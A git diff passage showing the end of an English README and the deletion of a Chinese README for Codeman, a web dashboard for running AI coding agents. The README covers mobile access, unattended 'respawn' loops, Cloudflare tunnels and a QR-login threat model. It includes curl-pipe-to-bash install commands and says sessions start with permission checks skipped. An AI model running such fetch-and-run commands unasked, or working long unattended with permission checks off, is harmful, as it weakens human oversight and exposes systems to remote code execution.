experimental features) — is spelled out in
|
||||
[`docs/versioning-policy.md`](docs/versioning-policy.md). If you script against
|
||||
the HTTP API, pin to an exact version.
|
||||
|
||||
## License
|
||||
|
||||
MIT — see [LICENSE](LICENSE)
|
||||
|
||||
---
|
||||
|
||||
<p align="center">
|
||||
<strong>Track sessions. Visualize agents. Control respawn. Let it run while you sleep.</strong>
|
||||
</p>
|
||||
- `tab-strip-directions/`: mockups for the header + session tab strip redesign discussion.
|
||||
|
||||
@@ -1,665 +0,0 @@
|
||||
<p align="center">
|
||||
<img src="docs/images/codeman-title.svg" alt="Codeman" height="60">
|
||||
</p>
|
||||
|
||||
<h2 align="center">AI 编程智能体的任务控制中心</h2>
|
||||
|
||||
<p align="center">
|
||||
<em>Claude Code • OpenCode • Codex —— 统一仪表盘 • 任意设备</em>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="README.md">English</a> • <strong>简体中文</strong>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-1e3a5f?style=flat-square" alt="License: MIT"></a>
|
||||
<a href="https://nodejs.org/"><img src="https://img.shields.io/badge/Node.js-18%2B-22c55e?style=flat-square&logo=node.js&logoColor=white" alt="Node.js 18+"></a>
|
||||
<a href="https://www.typescriptlang.org/"><img src="https://img.shields.io/badge/TypeScript-5.9-3b82f6?style=flat-square&logo=typescript&logoColor=white" alt="TypeScript 5.9"></a>
|
||||
<a href="https://fastify.dev/"><img src="https://img.shields.io/badge/Fastify-5.x-1e3a5f?style=flat-square&logo=fastify&logoColor=white" alt="Fastify"></a>
|
||||
<img src="https://img.shields.io/badge/Tests-2861%20total-22c55e?style=flat-square" alt="Tests">
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-demo.gif" alt="Codeman — 并行子智能体可视化" width="900">
|
||||
</p>
|
||||
|
||||
> 本文档由英文版 [`README.md`](README.md) 翻译而来。如有出入,以英文版为准。
|
||||
|
||||
---
|
||||
|
||||
## 快速开始 — 安装
|
||||
|
||||
```bash
|
||||
curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash
|
||||
```
|
||||
|
||||
该脚本会在缺失时自动安装 Node.js 和 tmux,把 Codeman 克隆到 `~/.codeman/app` 并完成构建。
|
||||
|
||||
你至少需要安装一个 AI 编程 CLI —— [Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai) 或 [Codex](https://developers.openai.com/codex/cli)(任意组合均可)。安装完成后:
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# 打开 http://localhost:3000,开启你的第一个会话
|
||||
```
|
||||
|
||||
<details>
|
||||
<summary><strong>作为后台服务运行</strong></summary>
|
||||
|
||||
**Linux(systemd):**
|
||||
```bash
|
||||
mkdir -p ~/.config/systemd/user
|
||||
cat > ~/.config/systemd/user/codeman-web.service << EOF
|
||||
[Unit]
|
||||
Description=Codeman Web Server
|
||||
After=network.target
|
||||
|
||||
[Service]
|
||||
Type=simple
|
||||
ExecStart=$(which node) $HOME/.codeman/app/dist/index.js web
|
||||
Restart=always
|
||||
RestartSec=10
|
||||
|
||||
[Install]
|
||||
WantedBy=default.target
|
||||
EOF
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now codeman-web
|
||||
loginctl enable-linger $USER
|
||||
```
|
||||
|
||||
**macOS(launchd):**
|
||||
```bash
|
||||
mkdir -p ~/Library/LaunchAgents
|
||||
cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
|
||||
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
<plist version="1.0">
|
||||
<dict>
|
||||
<key>Label</key>
|
||||
<string>com.codeman.web</string>
|
||||
<key>ProgramArguments</key>
|
||||
<array>
|
||||
<string>$(which node)</string>
|
||||
<string>$HOME/.codeman/app/dist/index.js</string>
|
||||
<string>web</string>
|
||||
</array>
|
||||
<key>RunAtLoad</key><true/>
|
||||
<key>KeepAlive</key><true/>
|
||||
<key>StandardOutPath</key>
|
||||
<string>/tmp/codeman.log</string>
|
||||
<key>StandardErrorPath</key>
|
||||
<string>/tmp/codeman.log</string>
|
||||
</dict>
|
||||
</plist>
|
||||
EOF
|
||||
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/com.codeman.web.plist
|
||||
```
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Windows(WSL)</strong></summary>
|
||||
|
||||
```powershell
|
||||
wsl bash -c "curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash"
|
||||
```
|
||||
|
||||
Codeman 依赖 tmux,因此 Windows 用户需要 [WSL](https://learn.microsoft.com/en-us/windows/wsl/install)。如果还没装 WSL:在管理员 PowerShell 中运行 `wsl --install`,重启,打开 Ubuntu,然后在 WSL 内安装你偏好的 AI 编程 CLI([Claude Code](https://docs.anthropic.com/en/docs/claude-code)、[OpenCode](https://opencode.ai) 或 [Codex](https://developers.openai.com/codex/cli))。安装完成后,即可从 Windows 浏览器访问 `http://localhost:3000`。
|
||||
</details>
|
||||
|
||||
---
|
||||
|
||||
## 移动端优化的 Web UI
|
||||
|
||||
在任意手机上都能获得最跟手的 AI 编程智能体体验。完整的 xterm.js 终端、本地回显、滑动导航,以及为真正的远程办公而设计的触控优化界面 —— 而不是把桌面 UI 硬塞进小屏幕。
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-landing-qr.png" alt="移动端 — 带二维码认证的登录页" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-idle.png" alt="移动端 — 带键盘配件栏的空闲会话" width="260"></td>
|
||||
<td align="center" width="33%"><img src="docs/screenshots/mobile-session-active.png" alt="移动端 — 活动中的智能体会话" width="260"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="center"><em>带二维码认证的登录页</em></td>
|
||||
<td align="center"><em>键盘配件栏</em></td>
|
||||
<td align="center"><em>智能体实时工作中</em></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<th>普通终端 App</th>
|
||||
<th>Codeman 移动端</th>
|
||||
</tr>
|
||||
<tr><td>远程输入延迟 200–300 毫秒</td><td><b>本地回显 —— 即时反馈</b></td></tr>
|
||||
<tr><td>字小、无上下文</td><td>完整 xterm.js 终端</td></tr>
|
||||
<tr><td>无会话管理</td><td>滑动切换会话</td></tr>
|
||||
<tr><td>无通知</td><td>审批 / 空闲时推送提醒</td></tr>
|
||||
<tr><td>需手动重连</td><td>tmux 持久化</td></tr>
|
||||
<tr><td>看不到智能体</td><td>实时查看后台智能体</td></tr>
|
||||
<tr><td>斜杠命令靠复制粘贴</td><td>一键 <code>/init</code>、<code>/clear</code>、<code>/compact</code></td></tr>
|
||||
<tr><td>在手机上手打密码</td><td><b>扫二维码 —— 即时认证</b></td></tr>
|
||||
</table>
|
||||
|
||||
### 安全的二维码认证
|
||||
|
||||
在手机键盘上输密码太痛苦了。Codeman 用**密码学安全的一次性二维码令牌**取而代之 —— 扫描桌面上显示的二维码,手机即刻完成认证。
|
||||
|
||||
每个二维码编码的是一个包含 6 字符短码的 URL,该短码在服务端映射到一个 256 位密钥(`crypto.randomBytes(32)`)。令牌每 **60 秒**自动轮换,**首次扫描即原子性消费**(重放永远失败),并采用**基于哈希的 `Map.get()` 查找**,不会通过响应时延泄露任何信息。短码只是一个不透明指针 —— 真正的密钥永远不会出现在浏览器历史、`Referer` 头或 Cloudflare 边缘日志中。
|
||||
|
||||
该安全设计覆盖了 ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin)(USENIX Security 2025,该研究发现 Top-100 网站中有 47 个存在漏洞)所指出的全部 6 个关键二维码认证缺陷:强制一次性使用、短 TTL、密码学随机性、服务端生成、扫描时桌面实时通知(QRLjacking 检测),以及 IP + User-Agent 会话绑定与手动吊销。双层速率限制(按 IP + 全局)使得在 62^6 = 568 亿种可能短码空间内进行暴力破解变得不可行。完整安全分析见:[`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
### 触控优化界面
|
||||
|
||||
- **键盘配件栏** —— 在虚拟键盘上方提供 `/init`、`/clear`、`/compact` 快捷按钮。破坏性命令(`/clear`、`/compact`)需双击确认 —— 第一次点击「上膛」,第二次点击执行 —— 这样在颠簸的通勤路上也不会误触
|
||||
- **滑动导航** —— 在终端上左右滑动切换会话(阈值 80px,300ms)
|
||||
- **智能键盘处理** —— 键盘弹出时工具栏与终端整体上移(使用 `visualViewport` API,并对 iOS 地址栏漂移设置 100px 阈值)
|
||||
- **安全区适配** —— 通过 `env(safe-area-inset-*)` 适配 iPhone 刘海与底部 Home 指示条
|
||||
- **44px 触控目标** —— 所有按钮均满足 iOS 人机界面指南的最小尺寸
|
||||
- **底部抽屉式 case 选择器** —— 用上滑模态框替代桌面端下拉菜单
|
||||
- **原生惯性滚动** —— `-webkit-overflow-scrolling: touch`,丝滑流畅
|
||||
|
||||
```bash
|
||||
codeman web --https
|
||||
# 在手机上打开:https://<你的IP>:3000
|
||||
```
|
||||
|
||||
> `localhost` 走纯 HTTP 即可。从其他设备访问时请使用 `--https`,或使用 [Tailscale](https://tailscale.com/)(推荐)—— 它提供私有网络,让你无需 TLS 证书即可从手机访问 `http://<tailscale-ip>:3000`。
|
||||
|
||||
---
|
||||
|
||||
## 实时智能体可视化
|
||||
|
||||
实时观看后台智能体工作。Codeman 监控智能体活动,将每个智能体显示在一个可拖拽的浮动窗口中,并用「黑客帝国」风格的动态连接线连回父会话。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-spawn.png" alt="子智能体可视化" width="900">
|
||||
</p>
|
||||
|
||||
- **浮动终端窗口** —— 每个智能体一个可拖拽、可调整大小的面板,带实时活动日志,逐条展示每一次工具调用、文件读取与进度更新
|
||||
- **连接线** —— 用动态绿色线条连接父会话与其子智能体,随智能体的产生与完成实时更新
|
||||
- **状态与模型徽标** —— 绿色(活动)、黄色(空闲)、蓝色(已完成)指示,并以 Haiku/Sonnet/Opus 的颜色编码区分模型
|
||||
- **自动行为** —— 窗口在产生时自动打开、完成时自动最小化,标签徽标显示「AGENT」或「AGENTS (n)」计数
|
||||
- **嵌套智能体** —— 支持 3 层层级(主会话 → 团队成员智能体 → 子-子智能体)
|
||||
|
||||
**智能体团队(Agent Teams)** —— 一等公民式支持 Claude Code 原生的多智能体团队(`CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`)。`TeamWatcher` 轮询 `~/.claude/teams/`,将团队成员匹配到其主会话,并以实时子智能体窗口呈现,且具备**团队感知的空闲检测** —— 因此当团队成员仍在工作时,重生控制器不会被触发。详见 [`docs/agent-teams/`](docs/agent-teams/)。
|
||||
|
||||
---
|
||||
|
||||
## 零延迟输入叠加层
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/zerolag-demo.gif" alt="Zerolag 演示 —— 本地回显与服务端回显并排对比" width="900">
|
||||
</p>
|
||||
|
||||
远程访问你的编程智能体时(VPN、Tailscale、SSH 隧道),每次按键通常需要 200–300 毫秒往返。Codeman 实现了一套**受 Mosh 启发的本地回显系统**,无论延迟多高,打字都感觉即时。
|
||||
|
||||
xterm.js 内部一个像素级精准的 DOM 叠加层以 0ms 渲染按键。后台转发会以 50ms 防抖批次静默地把每个字符送往 PTY,因此 Tab 补全、`Ctrl+R` 历史搜索以及所有 shell 特性都正常工作。当服务端回显在 200–300ms 后到达时,叠加层无缝消失、真实终端文本接管 —— 整个切换过程不可见。
|
||||
|
||||
- **抗 Ink 架构** —— 它作为 `.xterm-screen` 内 z-index 7 的一个 `<span>` 存在,完全不受 Ink 持续重绘屏幕的影响(此前两次使用 `terminal.write()` 的尝试都失败了,因为 Ink 会破坏注入的缓冲区内容)
|
||||
- **字体匹配渲染** —— 从 xterm.js 的计算样式读取 `fontFamily`、`fontSize`、`fontWeight` 与 `letterSpacing`,使叠加层文本与真实终端输出在视觉上无法区分
|
||||
- **完整编辑** —— 退格、重打、粘贴(多字符)、光标跟踪,输入超过终端宽度时多行换行
|
||||
- **重连后持久** —— 未发送的输入通过 localStorage 在页面刷新后保留
|
||||
- **默认启用** —— 桌面端与移动端均可用,会话空闲或繁忙时都生效
|
||||
|
||||
> 已抽取为独立库:[`xterm-zerolag-input`](https://www.npmjs.com/package/xterm-zerolag-input) —— 见[已发布的包](#已发布的包)。
|
||||
|
||||
---
|
||||
|
||||
## 重生控制器(Respawn Controller)
|
||||
|
||||
自主工作的核心。当智能体进入空闲,重生控制器会检测到,发送继续提示,循环执行上下文管理命令以获得全新上下文,然后恢复工作 —— 可完全无人值守运行 **24 小时以上**。
|
||||
|
||||
```
|
||||
WATCHING → IDLE DETECTED → SEND UPDATE → /clear → /init → CONTINUE → WATCHING
|
||||
```
|
||||
|
||||
- **多层空闲检测** —— 完成消息、AI 驱动的空闲检查、输出静默、token 稳定性
|
||||
- **用量限额自动恢复**(*可选,默认关闭*)—— 当 Claude 因订阅用量限额而停止("You've hit your limit · resets 3pm")时,Codeman 会解析重置时间,等到限额刷新(外加 2 分钟安全缓冲)后自动关闭限额对话框并发送 `continue`,让通宵任务平稳跨过 5 小时窗口而不是停摆到早晨。可识别 Claude Code 各版本的全部限额消息格式;若仍受限会自动重试;计划在 Codeman 重启后依然生效;暂停期间会阻止重生循环,避免 `/clear` 清掉等待中的对话。在会话 Respawn 标签页顶部按会话启用
|
||||
- **熔断器** —— 当 Claude 卡住时防止重生抖动(CLOSED → HALF_OPEN → OPEN 状态,跟踪连续无进展与重复错误)
|
||||
- **健康评分** —— 0–100 健康分,分项涵盖循环成功率、熔断器状态、迭代进展与卡死恢复
|
||||
- **内置预设** —— `solo-work`(3s 空闲,60min)、`subagent-workflow`(45s,240min)、`team-lead`(90s,480min)、`ralph-todo`(8s,480min)、`overnight-autonomous`(10s,480min)
|
||||
|
||||
---
|
||||
|
||||
## 编排器循环(Orchestrator Loop)
|
||||
|
||||
超越单会话重生,**编排器**把一个高层目标转化为分阶段计划,并跨多个智能体推动其完成 —— 这是一个运行 `idle → planning → approval → executing → verifying → (replanning) → completed` 的状态机。
|
||||
|
||||
- **先规划,后执行** —— 从你的目标生成分阶段计划,并在动手前暂停等待审批;可带反馈拒绝以重新生成
|
||||
- **逐阶段验证关卡** —— 每个阶段在下一阶段开始前都会被验证;失败时编排器会重新规划而非一头扎下去
|
||||
- **多智能体执行** —— 将各阶段分发给团队智能体 / 任务队列,协调超出单会话能力的工作
|
||||
- **崩溃安全** —— 完整状态持久化在 `state.json` 的 `orchestrator` 键下,可在重启后存续
|
||||
- **可从 UI 或 API 驱动** —— 编排器面板,或 `POST /api/orchestrator/start` → `/approve` → `/status`(共 10 个端点)
|
||||
|
||||
> 与 Ralph(单会话自主循环)不同:编排器协调多阶段、多智能体执行。完整设计:[`docs/orchestrator-loop-architecture.md`](docs/orchestrator-loop-architecture.md)。
|
||||
|
||||
---
|
||||
|
||||
## 多会话仪表盘
|
||||
|
||||
运行 **20 个并行会话**且全程可见 —— 60fps 的实时 xterm.js 终端、按会话的 token 与成本跟踪、基于标签的导航,以及一键管理。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/screenshots/multi-session-dashboard.png" alt="多会话仪表盘" width="800">
|
||||
</p>
|
||||
|
||||
### 持久化会话
|
||||
|
||||
每个会话都运行在 **tmux** 内 —— 会话可在服务器重启、网络中断与机器休眠后存续。启动时自动恢复,具备双重冗余。幽灵会话发现机制能找到孤立的 tmux 会话。受管会话带有环境标签,因此智能体不会杀掉自己的会话。
|
||||
|
||||
### 主机名感知的窗口标题
|
||||
|
||||
在多台主机上运行 Codeman(笔记本、开发机、NAS)?浏览器标签标题是 `codeman:<主机名>`,让你无需点进去就能分辨每个标签对应哪个后端:
|
||||
|
||||
```bash
|
||||
codeman web # codeman:<os.hostname()>
|
||||
codeman web --title-hostname dev-box # codeman:dev-box(用于覆盖嘈杂的主机名)
|
||||
```
|
||||
|
||||
标题在首字节时就被模板化进所提供的 HTML 中,因此从第一帧绘制起就是正确的,且无需 JavaScript 也能工作。同样的主机名前缀也应用于标签闪烁格式(`⚠️ (N) codeman:<host>`)和操作系统级桌面通知(`codeman:<host>: <事件>`),让系统通知中心里的跨主机提醒也不再含糊。
|
||||
|
||||
### 智能 Token 管理
|
||||
|
||||
| 阈值 | 动作 | 结果 |
|
||||
|-----------|--------|--------|
|
||||
| **110k tokens** | 自动 `/compact` | 上下文被摘要,工作继续 |
|
||||
| **140k tokens** | 自动 `/clear` | 以 `/init` 全新开始 |
|
||||
|
||||
### 通知
|
||||
|
||||
当会话需要关注时实时桌面提醒 —— `permission_prompt` 与 `elicitation_dialog` 触发关键的红色标签闪烁,`idle_prompt` 触发黄色闪烁。点击任意通知即可直接跳转到相关会话。Hook 按 case 目录自动配置。
|
||||
|
||||
### Ralph / Todo 跟踪
|
||||
|
||||
自动检测 Ralph 循环、`<promise>` 标签、TodoWrite 进度(`4/9 complete`)以及迭代计数器(`[5/50]`),并提供实时进度环与已用时间跟踪。
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/ralph-tracker-8tasks-44percent.png" alt="Ralph 循环跟踪" width="800">
|
||||
</p>
|
||||
|
||||
### 运行摘要(Run Summary)
|
||||
|
||||
点击任意会话标签上的图表图标,即可看到所发生一切的时间线 —— 重生周期、token 里程碑、自动 compact 触发、空闲/工作切换、hook 事件、错误等等。
|
||||
|
||||
### 零闪烁终端
|
||||
|
||||
基于终端的 AI 智能体(Claude Code 的 Ink、OpenCode 的 Bubble Tea)会在每次状态变更时重绘屏幕。Codeman 实现了一套 6 层抗闪烁流水线,让所有会话都获得平滑的 60fps 输出:
|
||||
|
||||
```
|
||||
PTY 输出 → 16ms 服务端批处理 → DEC 2026 包裹 → SSE → 客户端 rAF → xterm.js(60fps)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 更多特性
|
||||
|
||||
- **自更新** —— systemd/launchd 管理下的 git-clone 安装可在 **App Settings → Updates** 中原地更新:它会检测最新发行版,自动暂存(stash)脏工作树,并在服务重启期间流式展示构建进度(npm 安装会被报告为不可更新)
|
||||
- **多 CLI** —— 每个会话可选 **Claude Code**、**OpenCode** 或 **Codex**;环境变量前缀自动隔离(`CLAUDE_CODE_*`、`OPENCODE_*` 与 `CODEX_*`)。详见 [`docs/opencode-integration.md`](docs/opencode-integration.md)
|
||||
- **Effort 与 Ultracode** —— 设置每会话的默认 effort(`low`–`max`),或启用 **ultracode**(动态多智能体工作流)。这些都只是软默认值 —— 会话中可随时用 `/effort` 切换。扩展思考预算也可配置
|
||||
- **语音输入** —— 用 Deepgram Nova-3 口述提示(带 Web Speech API 回退):切换录音、自动静音停止、实时音量表(`Ctrl+Shift+V`)
|
||||
- **图像输入** —— 直接把图片粘贴或拖放进会话
|
||||
- **手势控制** *(可选)* —— 一个 MediaPipe 手部追踪叠加层,可徒手抓取/拖动会话窗口并捏合按钮。用 `CODEMAN_GESTURE=1` + App Settings → Display 启用
|
||||
- **多显示器横跨** *(macOS)* —— 一键打开一个横跨所有显示器最大化的浏览器窗口,让浮动的智能体/手势面板可以跨越物理拼接缝
|
||||
- **CJK / 输入法支持** —— 完整支持中文 / 日文 / 韩文的组合输入
|
||||
- **操作系统通知与主机名感知标题** —— 桌面提醒与标签标题以 `codeman:<host>` 为前缀,使多主机配置不再含糊
|
||||
|
||||
---
|
||||
|
||||
## 远程访问 —— Cloudflare 隧道
|
||||
|
||||
使用免费的 [Cloudflare 快速隧道](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/),从手机或本地网络外的任意设备访问 Codeman —— 无需端口转发、无需 DNS、无需静态 IP。
|
||||
|
||||
```
|
||||
浏览器(手机/平板)→ Cloudflare 边缘(HTTPS)→ cloudflared → localhost:3000
|
||||
```
|
||||
|
||||
**前置条件:** 安装 [`cloudflared`](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/downloads/) 并在环境中设置 `CODEMAN_PASSWORD`。
|
||||
|
||||
```bash
|
||||
# 快速开始
|
||||
./scripts/tunnel.sh start # 启动隧道,打印公网 URL
|
||||
./scripts/tunnel.sh url # 显示当前 URL
|
||||
./scripts/tunnel.sh stop # 停止隧道
|
||||
./scripts/tunnel.sh status # 服务状态 + URL
|
||||
```
|
||||
|
||||
脚本会在首次运行时自动安装一个 systemd 用户服务。隧道 URL 是一个随机生成的 `*.trycloudflare.com` 地址,每次隧道重启都会改变。
|
||||
|
||||
<details>
|
||||
<summary><strong>持久隧道(重启后存续)</strong></summary>
|
||||
|
||||
```bash
|
||||
# 启用为持久服务
|
||||
systemctl --user enable codeman-tunnel
|
||||
loginctl enable-linger $USER
|
||||
|
||||
# 或通过 Codeman Web UI:Settings → Tunnel → 切换为开
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>认证</strong></summary>
|
||||
|
||||
1. 首次请求 → 浏览器弹出 Basic Auth 提示(用户名:`admin` 或 `CODEMAN_USERNAME`)
|
||||
2. 成功后 → 服务端签发 `codeman_session` cookie(24 小时 TTL,活动时自动延长)
|
||||
3. 后续请求通过 cookie 静默认证
|
||||
4. 同一 IP 失败 10 次 → 429 速率限制(15 分钟衰减)
|
||||
|
||||
通过隧道暴露前**务必设置 `CODEMAN_PASSWORD`** —— 否则任何拿到 URL 的人都能完全访问你的会话。
|
||||
|
||||
</details>
|
||||
|
||||
### 二维码认证
|
||||
|
||||
在手机键盘上输密码很糟糕。Codeman 用**短暂的一次性二维码令牌**解决这个问题 —— 扫描桌面上的二维码,手机即刻完成认证。无密码提示、无打字、无剪贴板。
|
||||
|
||||
```
|
||||
桌面显示二维码 → 手机扫描 → GET /q/Xk9mQ3 → 服务端校验
|
||||
→ 令牌原子性消费(一次性) → 签发会话 cookie → 302 跳转到 /
|
||||
→ 桌面收到通知:「设备已通过二维码认证」 → 自动生成新二维码
|
||||
```
|
||||
|
||||
只拿到裸隧道 URL(没有二维码)的人,仍会撞上标准密码提示。二维码是快速通道;密码是回退方案。
|
||||
|
||||
#### 工作原理
|
||||
|
||||
服务端维护一个轮换的、短生命周期、一次性令牌池。每个令牌由一个 256 位密钥(`crypto.randomBytes(32)`)和一个用作 URL 路径中不透明查找键的 6 字符 base62 短码配对组成。二维码编码的 URL 形如 `https://abc-xyz.trycloudflare.com/q/Xk9mQ3` —— 短码是指针,而非密钥本身,因此它绝不会通过浏览器历史、`Referer` 头或 Cloudflare 边缘日志泄露。
|
||||
|
||||
每 **60 秒**,服务端自动轮换到一个全新令牌。上一个令牌会保留 **90 秒的宽限期**,以处理你刚好在轮换瞬间扫描的竞争情况 —— 此后即作废。每个令牌都是**一次性**的:手机一旦成功扫描,令牌就被原子性消费,并立即为桌面显示生成一个新的。
|
||||
|
||||
#### 安全设计
|
||||
|
||||
该设计参考了 ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin)(USENIX Security 2025),该研究发现 Top-100 网站中有 47 个因横跨 42 个 CVE 的 6 个关键设计缺陷而易受二维码认证攻击。Codeman 全部六个都做了应对:
|
||||
|
||||
| USENIX 缺陷 | 缓解措施 |
|
||||
|-------------|------------|
|
||||
| **缺陷 1**:缺少一次性强制 | 令牌首次扫描即原子性消费 —— 重放永远失败 |
|
||||
| **缺陷 2**:长生命周期令牌 | 60s TTL + 90s 宽限,由定时器自动轮换 |
|
||||
| **缺陷 3**:可预测的令牌生成 | `crypto.randomBytes(32)` —— 256 位熵。短码采用拒绝采样以消除取模偏差 |
|
||||
| **缺陷 4**:客户端令牌生成 | 仅服务端 —— 令牌在嵌入二维码前绝不离开服务器 |
|
||||
| **缺陷 5**:缺少状态通知 | 桌面提示:*「设备 [IP] 已通过二维码认证(Safari)。不是你?[吊销]」* —— 实时 QRLjacking 检测 |
|
||||
| **缺陷 6**:会话绑定不足 | 存储 IP + User-Agent 以供审计。通过 API 手动吊销会话。HttpOnly + Secure + SameSite=lax cookie |
|
||||
|
||||
#### 时序安全的查找
|
||||
|
||||
短码存储在 `Map<shortCode, TokenRecord>` 中。校验使用 `Map.get()` —— 一个基于哈希的 O(1) 查找,不会通过响应时延泄露目标字符串的任何信息。热路径上任何地方都没有逐字符字符串比较,彻底消除了时序侧信道攻击。
|
||||
|
||||
#### 速率限制(双层)
|
||||
|
||||
二维码认证有自己的速率限制,与密码认证完全独立:
|
||||
|
||||
- **按 IP**:同一 IP 失败 10 次二维码尝试即触发 429 封锁(15 分钟衰减窗口)—— 与 Basic Auth 的失败计数器分开,因此打错密码不会消耗你的二维码额度
|
||||
- **全局**:所有 IP 合计每分钟 30 次二维码尝试 —— 抵御分布式暴力破解。考虑到 62^6 = 568 亿种可能短码、任意时刻仅约 2 个有效,无论如何暴力破解都在计算上不可行
|
||||
|
||||
#### 二维码尺寸优化
|
||||
|
||||
URL 被刻意保持精简(`/q/` 路径 + 6 字符码 ≈ 53–56 个字符),以瞄准 **QR 版本 4**(33×33 模块)而非版本 5(37×37)。更小的二维码在低端手机上扫描更快 —— 现代设备读取版本 4 仅需 100–300 毫秒。`/q/` 前缀相比 `/qr-auth/` 省下 7 个字节,仅此一项就足以决定二维码版本的差别。
|
||||
|
||||
#### 桌面体验
|
||||
|
||||
二维码显示每 60 秒通过 SSE 自动刷新,SVG 直接嵌入事件载荷(约 2–5KB)—— 无需额外 HTTP 请求,刷新低于 50ms。倒计时器显示剩余时间。「重新生成」按钮可即时使所有现有令牌失效并创建一个新的(在你怀疑二维码被拍照时很有用)。
|
||||
|
||||
当有人通过二维码认证时,桌面会弹出一个带设备 IP 与浏览器信息的通知 —— 如果不是你,一键即可吊销所有会话。
|
||||
|
||||
#### 威胁覆盖
|
||||
|
||||
| 威胁 | 为何无效 |
|
||||
|--------|-------------------|
|
||||
| **二维码截图被分享** | 一次性:首次扫描即消费。60s TTL:攻击者动手前已过期。桌面通知会立即提醒你。 |
|
||||
| **重放攻击** | 原子性一次性消费 + 60s TTL。旧 URL 始终返回 401。 |
|
||||
| **Cloudflare 边缘日志** | 短码是不透明的 6 字符查找键,而非真正的 256 位令牌。一次性意味着从日志重放永远失败。 |
|
||||
| **暴力破解** | 568 亿种组合、任意时刻约 2 个有效、双层速率限制,早在统计可行性之前就已拦截。 |
|
||||
| **QRLjacking** | 60s 轮换迫使实时转发。桌面提示提供即时检测。自托管单用户场景使钓鱼难以成立。 |
|
||||
| **时序攻击** | 基于哈希的 Map 查找 —— 无字符串比较时序泄露。 |
|
||||
| **会话 cookie 窃取** | HttpOnly + Secure + SameSite=lax + 24h TTL。可在 `POST /api/auth/revoke` 手动吊销。 |
|
||||
|
||||
#### 横向对比
|
||||
|
||||
| 平台 | 模型 | 对比 |
|
||||
|----------|-------|------------|
|
||||
| **Discord** | 长生命周期令牌、无确认、[屡被利用](https://owasp.org/www-community/attacks/Qrljacking) | Codeman:一次性 + TTL + 通知 |
|
||||
| **WhatsApp Web** | 手机确认「关联设备?」,约 60s 轮换 | 轮换相当;WhatsApp 额外加了显式确认(对单用户而言是可接受的取舍) |
|
||||
| **Signal** | 临时公钥、端到端加密信道 | 加密更强,但 [2025 年仍被俄罗斯国家级行为者](https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger)通过社会工程攻破 |
|
||||
|
||||
> 完整设计理由、安全分析与实现细节:[`docs/qr-auth-plan.md`](docs/qr-auth-plan.md)
|
||||
|
||||
---
|
||||
|
||||
## 安全
|
||||
|
||||
Codeman 用 `--dangerously-skip-permissions` 启动会话,因此 Web UI 在设计上对任何能访问到它的人都是一个远程代码执行面 —— 整套安全模型的存在就是为了控制*谁*能访问。近期加固(v0.9.0 + v0.9.5)封堵了那些常困扰自托管开发工具的浏览器驱动攻击路径。完整模型:[`docs/security-architecture.md`](docs/security-architecture.md)。
|
||||
|
||||
### 网络与访问
|
||||
|
||||
- **默认仅环回** —— 绑定 `127.0.0.1`,仅可从本机访问,因此「无密码」默认配置开箱即安全。在未设置 `CODEMAN_PASSWORD` 的情况下绑定非环回主机会*启动但打印一条醒目警告*,并给出三个具体修复方案(设置密码、环回 + 一个带认证的隧道,或用 `--allow-unauthenticated-network` 显式确认)
|
||||
- **可选认证,真实会话** —— 通过 `CODEMAN_USERNAME`(默认 `admin`)/ `CODEMAN_PASSWORD` 的 HTTP Basic 认证。成功后签发一个不透明的 256 位 `codeman_session` cookie(`randomBytes(32)`)—— 服务端校验,而非客户端签名,因此无法离线伪造(24h TTL、自动延长、设备上下文审计日志)
|
||||
- **按 IP 速率限制** —— 失败 10 次 → `429` 并带 `Retry-After`(15 分钟衰减)。即便攻击者在同一 IP 上猛攻,有效 cookie 或正确密码也能*立即*恢复 —— 这很重要,因为所有隧道流量共享同一个环回 IP。二维码认证有自己独立的限制器
|
||||
|
||||
### 始终开启的浏览器加固(v0.9.5)
|
||||
|
||||
以下对**每个**请求都生效 —— 在认证之前,即便是默认的无密码环回安装:
|
||||
|
||||
- **Host 头允许列表 → 阻断 DNS 重绑定。** 一个被重绑定到 `127.0.0.1` 的自定义域名会在任何处理器运行前被 `403 host not allowed` 拒绝。允许:`localhost`、任意 IP 字面量、绑定主机、`.ts.net` / `.trycloudflare.com` / `.cfargotunnel.com`、当前受管隧道,以及 `CODEMAN_ALLOWED_HOSTS`(在此添加自定义反向代理域名 —— 逗号分隔;精确主机或前导点 `.suffix` 匹配子域名)
|
||||
